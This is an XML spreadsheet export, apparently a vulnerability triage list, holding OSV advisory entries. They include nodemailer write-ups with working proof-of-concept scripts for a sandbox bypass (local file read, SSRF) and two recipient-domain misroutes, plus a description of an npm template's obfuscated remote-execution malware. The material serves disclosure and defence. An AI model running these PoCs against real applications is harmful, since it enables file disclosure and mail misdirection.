Root cause. The `MailMessage` constructor stores the transporter-level sandbox flags on the message object (`lib/mailer/mail-message.js:34-38`):

```js
['disableFileAccess', 'disableUrlAccess', 'normalizeHeaderKey', 'maxRecipients'].forEach(key =&gt; {
    if (key in options) {
        this.data[key] = options[key];
    }
});
```

The public resolver is a pure passthrough (`lib/mailer/mail-message.js:41-43`):

```js
resolveContent(...args) {
    return shared.resolveContent(...args);
}
```

`shared.resolveContent` supports the legacy 3-argument signature and collapses the missing options to `{}` (`lib/shared/index.js:524-530`):

```js
module.exports.resolveContent = (data, key, options, callback) =&gt; {
    // options is optional; support the legacy resolveContent(data, key, callback) signature
    if (!callback &amp;&amp; typeof options === 'function') {
        callback = options;
        options = false;
    }
    options = options || {};
    ...
    resolveContentValue(data, key, options, callback);
```

`resolveContentValue` then checks `options.disableUrlAccess` / `options.disableFileAccess` (`lib/shared/index.js:581` / `:590`), both `undefined` for the legacy signature, so it falls through to `nmfetch` (`:588`) or `fs.createReadStream` (`:597`).

Contrast with the fixed paths. `resolveAll()` (`lib/mailer/mail-message.js:112-115`) and `_convertDataImages()` (`lib/mailer/index.js:437-440`) both pass the message flags explicitly. The MIME streaming path (`lib/mime-node/index.js:1059-1077`) also honors the flags. So an application that enables the sandbox and then calls `transporter.sendMail()` is protected; the bypass appears only when message content is resolved through the public legacy-signature API — which is the documented plugin usage (the `resolveContent` JSDoc at `lib/shared/index.js:510-523` states it is "useful when you want to create a plugin that needs a content value").

Affected versions. Confirmed on `9.1.0` (HEAD `efd6e29c10c6e0c25c57bd2f2a71302838235a4f`, the current npm latest). The gap was introduced by the GHSA-wqvq-jvpq-h66f fix and is still present; the public API has no regression coverage (`test/mailer/mail-message-test.js` contains no `resolveContent` test).

### PoC

Requires: `nodemailer@9.1.0`, a readable local file, and any reachable HTTP endpoint (loopback suffices). Non-destructive; no network egress beyond a local listener.

```js
'use strict';
const nodemailer = require('nodemailer');
const MailMessage = require('nodemailer/lib/mailer/mail-message');

const TARGET_FILE = '/app/src/package.json';   // any readable local file
const SSRF_URL = 'http://http-sink:8080/poc-ssrf'; // any local/internal HTTP target

const transporter = nodemailer.createTransport({
    streamTransport: true,
    disableFileAccess: true,   // sandbox explicitly enabled
    disableUrlAccess: true
});

const data = {
    from: 'a@example.com', to: 'b@example.com', subject: 'poc', text: 'hello',
    html: { path: TARGET_FILE },
    attachments: [{ filename: 'x.bin', href: SSRF_URL }]
};
const mail = new MailMessage(transporter, data);
// mail.data.disableFileAccess === true, mail.data.disableUrlAccess === true

// Documented legacy plugin signature — options argument omitted:
mail.resolveContent(mail.data, 'html', (err, value) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('FILE_READ_OK len=', value.length);          // -&gt; 1647 (package.json)
});
mail.resolveContent(mail.data.attachments, 0, (err, body) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('URL_FETCH_OK body=', body.toString());      // -&gt; fetched response
});
```

Observed output on the audit environment (Node 22, `nodemailer@9.1.0`):

```text
mail.data.disableFileAccess = true | disableUrlAccess = true
[CONTROL resolveAll] err = EFILEACCESS : File access rejected for /app/src/package.json
[CONTROL html.path explicit-options] err = EFILEACCESS
[BYPASS html.path legacy] READ OK len = 1647 head = "{\n    \"name\": \"nodemailer\",\n    \"version\": \"9.1.0\",\n    \"des"
[BYPASS att[0].href legacy] FETCH OK len = 13 body = "HTTP-SINK OK\n"
```

The negative controls (`resolveAll`, and `resolveContent` with explicit `{ disableFileAccess: true }`) return `EFILEACCESS`, proving the sandbox works on the protected paths and only the legacy-signature passthrough is bypassed. The same bypass reproduces inside a real `transporter.sendMail()` flow when a `compile` plugin calls `mail.resolveContent(mail.data, 'html', cb)` / `mail.resolveContent(mail.data.attachments, 0, cb)`.

### Impact

An application that enables `disableFileAccess` / `disableUrlAccess` to contain untrusted message content and that resolves content through the documented plugin API (`mail.resolveContent(data, key, callback)`) has its sandbox silently bypassed:

- Arbitrary local file disclosure: a message `html`/attachment `path` pointing at a server file (`/etc/passwd`, `.env`, key material) is read and returned to the caller / delivered in the message.
- Server-side request forgery: a message `href` pointing at an internal or loopback URL is fetched from the application host.

Reachability precondition: the sandbox flags must be enabled (default off) and the application or its plugin must invoke the documented legacy-signature API on attacker-influenced data. The default `transporter.sendMail()` path remains protected, so this is a defense-in-depth gap in the library's own access-control enforcement rather than a default-flow bypass. It is the same vulnerability class as the previously accepted GHSA-wqvq-jvpq-h66f (CVE-2026-82660) and GHSA-p6gq-j5cr-w38f (CVE-2026-82659), on a distinct third code path.</t></is></c><c r="T90" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-8m3c-c648-2xjj</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D91" s="5" t="inlineStr" /><c r="E91" s="5" t="inlineStr" /><c r="F91" s="5" t="inlineStr" /><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="inlineStr" /><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr" /><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M91" s="5" t="inlineStr" /><c r="N91" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q91" s="5" t="inlineStr" /><c r="R91" s="5" t="inlineStr" /><c r="S91" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3174ac7cecbc1869ae5ac87ea585de744f6b7d17b8c089b746384c2b7e2355a3)
This template package ships files/vite.config.js which, after a benign Vite header, appends ~26KB of heavily obfuscated code (obfuscator.io-style string-array with rotation dispatcher, hex payloads XOR-decoded at runtime with key 0xA2, arithmetic-hidden numeric literals). When the scaffolded project is run via `vite` / `npm run dev`, the config executes a `run()` routine that queries Ethereum JSON-RPC endpoints (`eth_getBlockByNumber`, `eth_getTransactionCount`) against a hardcoded sender address to resolve a command-and-control IP hidden in on-chain transaction data, fetches an XOR-encrypted payload over HTTP, decrypts it, and passes it to both `eval(...)` and `spawn('node', ['-e', payload], {detached: true, stdio: 'ignore', windowsHide: true})`, yielding a hidden detached Node process on the developer's machine. The package's declared `main` (dist/index.js) is inert, so scanners inspecting only the entry point miss the payload; the obfuscation and EtherHiding indirection exist solely to conceal the remote-execution chain from static review. Execution fires the first time a developer runs the scaffolded project generated from this template, giving full RCE on the developer's host.

## Source: ghsa-malware (9cb614be24802762692ee3d58173981e3c20bdebe4fabd6846ab71671568d4ca)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91" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D92" s="5" t="inlineStr" /><c r="E92" s="5" t="inlineStr" /><c r="F92" s="5" t="inlineStr" /><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="inlineStr" /><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M92" s="5" t="inlineStr" /><c r="N92" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O92" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P92" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q92" s="5" t="inlineStr" /><c r="R92" s="5" t="inlineStr" /><c r="S92" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (558344f06c374c5eff9c870250d63a5e9f784ffe23f91182154d9c66c441ee0b)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (4708373dfb7211317f4ebae7bd11027043840e6db7a9f2d9aa3385611a2fdad8)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92" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>GHSA-cc9r-2j5m-2m83</t></is></c><c r="D93" s="5" t="inlineStr" /><c r="E93" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="inlineStr" /><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr" /><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M93" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N93" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q93" s="5" t="inlineStr" /><c r="R93" s="5" t="inlineStr" /><c r="S93" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's email-address parser treats an **RFC 5322 comment** `( ... )` inside the domain as a point to **concatenate** the surrounding text, rather than as folding whitespace (CFWS) that **terminates** the domain. Consequently a recipient address such as `user@good-corp.com(x)evil.com` is parsed and **delivered to `good-corp.comevil.com`** (registrable domain `comevil.com`, attacker‑controlled), while a conformant RFC 5322 parser terminates the domain at the comment and reads `good-corp.com`.

An application that decides *whether it is allowed to email a recipient* by parsing/validating the recipient's domain — with a strict RFC 5322 parser (used without inspecting parse defects) or with a naive prefix/substring allow‑list — and then hands the raw address to Nodemailer for delivery, can be induced to send mail to a domain the attacker controls. This is an **Interpretation Conflict (CWE‑436)**, the same class as CVE‑2025‑13033, reached through the RFC 5322 *comment* construct (the "Comments" technique in PortSwigger's *Splitting the email atom* research, which produced a Postfix fix).

Severity is **Moderate**: exploitation requires the app's domain check to disagree with Nodemailer (see **Impact** for exactly which parsers do and do not). Verified end‑to‑end against a real RFC 5321 SMTP server (nodemailer 9.0.6 → `aiosmtpd`).

### Details

Root cause is in `lib/addressparser/index.js`.

1. The tokenizer registers the comment as an operator pair (`Tokenizer.operators`):
   ```js
   '(': ')',            // line ~331
   ```
2. When the **closing** `)` is immediately followed by a non‑break character (anything other than space / tab / CR / LF / `,` / `;`), the tokenizer marks that operator token with `noBreak = true`:
   ```js
   // Tokenizer.checkChar, lines ~398-399
   if (nextChr &amp;&amp; ![' ', '\t', '\r', '\n', ',', ';'].includes(nextChr)) {
       this.node.noBreak = true;
   }
   ```
3. `_handleAddress` then **glues** the token that follows the comment onto the token that preceded it (dropping the comment):
   ```js
   // _handleAddress, lines ~187-188
   if (prevToken &amp;&amp; prevToken.noBreak &amp;&amp; data[state].length) {
       data[state][data[state].length - 1] += token.value;   // &lt;-- concatenation
   }
   ```

For the input `user@good-corp.com(x)evil.com` the tokens are `text:"user@good-corp.com"`, `op:"("`, `text:"x"`, `op:")"` (flagged `noBreak`), `text:"evil.com"`. Step 3 appends `evil.com` onto `user@good-corp.com`, producing the single domain **`good-corp.comevil.com`**. The comment content (`x`) is discarded into the display‑name field.

RFC 5322 defines a comment as CFWS — semantically folding whitespace — and it may **not** appear inside a `dot-atom`. A comment therefore *separates* tokens and terminates the domain; the conformant reading of `good-corp.com(x)evil.com` is the domain `good-corp.com` (with the trailing `evil.com` being invalid/ignored). Nodemailer instead concatenates the two atoms across the removed comment, yielding a different, attacker‑registrable domain.

Nodemailer uses the parsed address for **both** the SMTP envelope (`getEnvelope()` → `RCPT TO`) and the emitted `To:`/`From:` headers, so the entire message is routed to the concatenated domain.

**Related grammar defect (bonus, lower impact):** nested comments are legal in RFC 5322, but the tokenizer closes the comment at the *first* `)` (`chr === this.operatorExpecting`, line ~392), so a valid nested comment such as `user@x.com(a(b)c)` is mis‑balanced and mangled to `x.comc)`. That particular output contains a stray `)` and is **rejected** by a conformant MTA (501) — a bounce/robustness issue, not a misroute.

**Suggested fix:** treat a comment as folding whitespace that terminates the current token — i.e. do **not** propagate `noBreak` across a comment‑closing `)` (restrict the `noBreak` optimization to quoted‑string closes), and support nested comments per RFC 5322. Equivalently, never emit a domain formed by concatenating two atoms that were separated only by a comment.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No special transport configuration is required; the discrepancy is in address parsing.

`poc-comment.js`:
```js
'use strict';
const net = require('net');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'good-corp.com';
const RECIPIENT = 'user@good-corp.com(x)evil.com'; // RFC 5322 comment (x) between two domains

//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'app@good-corp.com', to: RECIPIENT, subject: 'hi', text: 'x' });
  t.close(); server.close();
});
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-comment.js
```

Actual output (nodemailer 9.0.6):
```
nodemailer transmits : RCPT TO:&lt;user@good-corp.comevil.com&gt;
```

The application asked to mail `user@good-corp.com(x)evil.com`; Nodemailer delivers to `good-corp.comevil.com` — registrable domain `comevil.com`, which an attacker can register.

**Verified against a real RFC 5321 server** (containerized lab included with this report — `docker compose up --build`, case `R8_comment_glue`, receiver = `aiosmtpd`):
```
wire RCPT TO                     : RCPT TO:&lt;user@good-corp.comevil.com&gt;
real server                      : ACCEPTED (250)
recipient parsed by real server  : user@good-corp.comevil.com   (domain good-corp.comevil.com)
delivered To header              : x &lt;user@good-corp.comevil.com&gt;
```

**Which parser sees what** (the crux of exploitability):

| Parser used by the application to gate/route | Domain it reads from `user@good-corp.com(x)evil.com` | Deceived? |
|---|---|---|
| Python `email.policy.default` (strict RFC 5322) | `good-corp.com` *(flags `InvalidHeaderDefect`)* | Yes, if defects are not checked |
| Naive prefix / substring allow‑list (`startsWith`/`includes('@good-corp.com')`) | `good-corp.com` | Yes |
| Nodemailer's own `addressparser` | `good-corp.comevil.com` | No |
| Python `email.utils.getaddresses` | `good-corp.comevil.com` | No |
| WHATWG `url.domainToASCII` | `good-corp.com(x)evil.com` | No |

### Impact



* **Who is impacted:** applications that make a security or routing decision on the recipient **domain** using a parser that terminates the domain at the comment, while relying on Nodemailer for delivery — specifically those that validate with a strict RFC 5322 parser **without inspecting parse defects**, or with a **prefix/substring/allow‑list** check (e.g. "only send to `@good-corp.com`", employee‑only flows, "same‑tenant" routing). Applications that validate with Nodemailer's own `addressparser`, `email.utils.getaddresses`, or `url.domainToASCII` are **not** affected, which is why this is rated below the IDN/Punycode issue.

## Patched in 9.1.0

Fixed in [902b63e](https://github.com/nodemailer/nodemailer/commit/902b63e).

Not propagating `noBreak` across the closing `)` on its own breaks valid addresses, because CFWS is legal on either side of the `@`: `user@(x)good-corp.com` and `user(x)@good-corp.com` both come out mangled. A comment now joins what it separates only when one side carries the `@`, so those keep resolving while `user@good-corp.com(x)evil.com` terminates at `good-corp.com`.

Quoted-string and angle-address joining are unchanged. Nested comments are still not modelled, but the misroute is gone: `user@x.com(a(b)c)` now yields `user@x.com`.</t></is></c><c r="T93" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-cc9r-2j5m-2m83</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D94" s="5" t="inlineStr" /><c r="E94" s="5" t="inlineStr" /><c r="F94" s="5" t="inlineStr" /><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="inlineStr" /><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr" /><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M94" s="5" t="inlineStr" /><c r="N94" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q94" s="5" t="inlineStr" /><c r="R94" s="5" t="inlineStr" /><c r="S94" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ad4c3329ebb2fdeb3b9ddc93abcb5f3dab6773f7a7999ff96d063d49edc04d9)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (23d279de5770039164036b3717fa8188b73601e773d8647f1a4e1b6ac59c5a17)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94" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D95" s="5" t="inlineStr" /><c r="E95" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F95" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="inlineStr" /><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr" /><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M95" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N95" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q95" s="5" t="inlineStr" /><c r="R95" s="5" t="inlineStr" /><c r="S95" s="5" t="inlineStr"><is><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is></c><c r="T95" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D96" s="5" t="inlineStr" /><c r="E96" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F96" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="inlineStr" /><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr" /><c r="K96" s="5" t="inlineStr" /><c r="L96" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M96" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N96" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P96" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q96" s="5" t="inlineStr" /><c r="R96" s="5" t="inlineStr" /><c r="S96" s="5" t="inlineStr"><is><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is></c><c r="T96" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D97" s="5" t="inlineStr" /><c r="E97" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F97" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="inlineStr" /><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr" /><c r="K97" s="5" t="inlineStr" /><c r="L97" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M97" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N97" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q97" s="5" t="inlineStr" /><c r="R97" s="5" t="inlineStr" /><c r="S97" s="5" t="inlineStr"><is><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is></c><c r="T97" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>GHSA-rgj7-g3m4-5g8c</t></is></c><c r="D98" s="5" t="inlineStr" /><c r="E98" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F98" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="inlineStr" /><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr" /><c r="K98" s="5" t="inlineStr" /><c r="L98" s="5" t="inlineStr"><is><t>npm:sharp</t></is></c><c r="M98" s="5" t="inlineStr"><is><t>0.35.4</t></is></c><c r="N98" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q98" s="5" t="inlineStr" /><c r="R98" s="5" t="inlineStr" /><c r="S98" s="5" t="inlineStr"><is><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is></c><c r="T98" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>GHSA-v3f6-m9j2-437p</t></is></c><c r="D99" s="5" t="inlineStr" /><c r="E99" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="inlineStr" /><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr" /><c r="L99" s="5" t="inlineStr"><is><t>NuGet:Microsoft.AspNetCore.Server.IISIntegration</t></is></c><c r="M99" s="5" t="inlineStr"><is><t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t></is></c><c r="N99" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q99" s="5" t="inlineStr" /><c r="R99" s="5" t="inlineStr" /><c r="S99" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-8cp2-47hg-mfgh. This link is maintained to preserve external references.

### Original Description
Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T99" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p</t></is></c></row><row r="100"><c r="A100" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B100" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C100" s="5" t="inlineStr"><is><t>GHSA-wmmp-3585-3rmp</t></is></c><c r="D100" s="5" t="inlineStr" /><c r="E100" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F100" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G100" s="5" t="inlineStr" /><c r="H100" s="5" t="inlineStr" /><c r="I100" s="5" t="inlineStr" /><c r="J100" s="5" t="inlineStr" /><c r="K100" s="5" t="inlineStr" /><c r="L100" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M100" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N100" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P100" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q100" s="5" t="inlineStr" /><c r="R100" s="5" t="inlineStr" /><c r="S100" s="5" t="inlineStr"><is><t>### Summary

Nodemailer resolves an international (IDN / non-ASCII) recipient **domain** to a different Punycode `xn--` label than every UTS‑46‑conformant parser (web browsers, the WHATWG URL Standard, Node's `url.domainToASCII`, Python's `idna`). Its address normalizer (`_normalizeAddress` in `lib/mime-node/index.js`) uses the bundled **raw RFC‑3492 Punycode codec with no UTS‑46 mapping/normalization**, so a domain that a standards‑compliant validator maps to a trusted domain is delivered by Nodemailer to a **different, attacker‑registrable domain**.

An application that applies a domain allow‑list / same‑domain check to a recipient using a normal IDN‑aware parser (or that shows the normalized recipient to a user for confirmation) and then relies on Nodemailer to deliver to that domain can be induced to send email to an **unintended external domain**. This is the same weakness class as CVE‑2025‑13033 (Interpretation Conflict, CWE‑436) but reached through IDN/Punycode rather than quoted local‑parts, and it is not addressed by the 7.0.7 fix.

Because the mismatch can be triggered with an **invisible** character (U+00AD SOFT HYPHEN) that UTS‑46 folds away to the *exact* trusted domain string, no visible look‑alike/homograph is required.

### Details

`lib/mime-node/index.js` → `_normalizeAddress(address)` (around lines 1307–1346) splits the address at the last `@` and normalizes the domain like this:

```js
// lib/mime-node/index.js
try {
    if (/[\x80-￿]/.test(user)) {
        encodedDomain = punycode.toUnicode(domain.toLowerCase());   // line ~1338
    } else {
        encodedDomain = punycode.toASCII(domain.toLowerCase());     // line ~1340
    }
} catch (_err) {
    // keep domain as supplied
}
return `${this._normalizeLocalPart(user)}@${encodedDomain}`;         // line ~1346
```

`punycode` here is the project’s bundled codec (`lib/punycode/`), which is a **pure RFC 3492 (Punycode) implementation**. The only normalization applied to the domain is `.toLowerCase()`. It performs **none of the UTS‑46 “IDNA2008 + compatibility processing” steps** that browsers and DNS‑facing resolvers apply before Punycode encoding, specifically:

* removing **Ignored** code points such as `U+00AD` SOFT HYPHEN,
* **Mapping** full‑width / compatibility characters to their canonical ASCII forms,
* Unicode **NFC** normalization,
* validity checks.

As a result, for any domain containing a UTS‑46‑mapped or ‑ignored character, Nodemailer’s `punycode.toASCII(...)` produces a **different A‑label** than `url.domainToASCII(...)` (Node ≥ 7 / WHATWG), `new URL('http://'+domain)`, browsers, and Python’s `idna` (`uts46=True`). Nodemailer then uses its A‑label as:

* the SMTP envelope recipient written to the wire as `RCPT TO:&lt;local@xn--…&gt;` (`getEnvelope()` → `lib/smtp-connection/index.js` `_setEnvelope`), **and**
* the address emitted in the `To:` / `From:` headers (`_convertAddresses`).

So the domain a standards‑compliant validator computes and the domain Nodemailer actually delivers to **disagree**, on a syntactically valid, validator‑accepted address. Concrete divergences (verified on 9.0.6):

| recipient (raw) | UTS‑46 parser (`url.domainToASCII`) | Nodemailer delivers to |
|---|---|---|
| `victim@compa{U+00AD}ny.com` (invisible soft hyphen) | `company.com` | `xn--company-pka.com` |
| `victim@ｃｏｍｐａｎｙ.com` (full‑width) | `company.com` | `xn--mi7cd4afch9d.com` |
| `user@exámple.com` (NFD `a`+U+0301) | `xn--exmple-qta.com` | `xn--example-vge.com` |

This is the “Punycode / IDN parser discrepancy” technique documented in PortSwigger’s *Splitting the email atom* research (which produced e.g. Joomla CVE‑2024‑21725 and fixes in the PHP `idna_convert` library). The fix for CVE‑2025‑13033 (nodemailer 7.0.7) hardened the *quoted‑local‑part* path only; this IDN path is independent and still present in **9.0.6 (latest)** and, given the long‑standing use of the bundled RFC‑3492 codec, earlier releases.

**Suggested remediation:** perform UTS‑46 processing before/at domain encoding so Nodemailer’s resolution matches browsers, validators, and DNS — e.g. use the runtime’s `url.domainToASCII()` (available since Node 7) instead of the raw `punycode.toASCII`, and decode with the matching UTS‑46 `domainToUnicode`. At minimum, reject a domain whose value changes under UTS‑46 mapping (i.e. `punycode.toASCII(d)` ≠ `url.domainToASCII(d)`).

### PoC

Environment: Node.js ≥ 18, the published `nodemailer@9.0.6`. No special configuration; the discrepancy is in domain normalization itself.

`poc-idn.js`:

```js
'use strict';
const net = require('net');
const url = require('url');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'company.com';                        // the only domain the app will mail
const RECIPIENT = 'victim@compa\u00ADny.com';           // attacker input: invisible U+00AD inside "company"

// The app's domain allow-list check, done the standard (UTS-46 / browser / WHATWG) way:
const seen = url.domainToASCII(RECIPIENT.split('@').pop());
console.log('validator (url.domainToASCII) sees:', JSON.stringify(seen),
            seen === TRUSTED ? '=&gt; ALLOWED (equals trusted domain)' : '');

// A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'app@company.com', to: RECIPIENT, subject: 'reset your password', text: 'secret link' });
  t.close(); server.close();
});
```

Run:

```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-idn.js
```

Actual output (Nodemailer 9.0.6):

```
validator (url.domainToASCII) sees: "company.com" =&gt; ALLOWED (equals trusted domain)
nodemailer transmits             : RCPT TO:&lt;victim@xn--company-pka.com&gt;
```

The application’s domain check approves `company.com`, but the message is sent to `xn--company-pka.com` — a **different domain an attacker can register** — carrying the `To:` header `&lt;victim@xn--company-pka.com&gt;` as well.

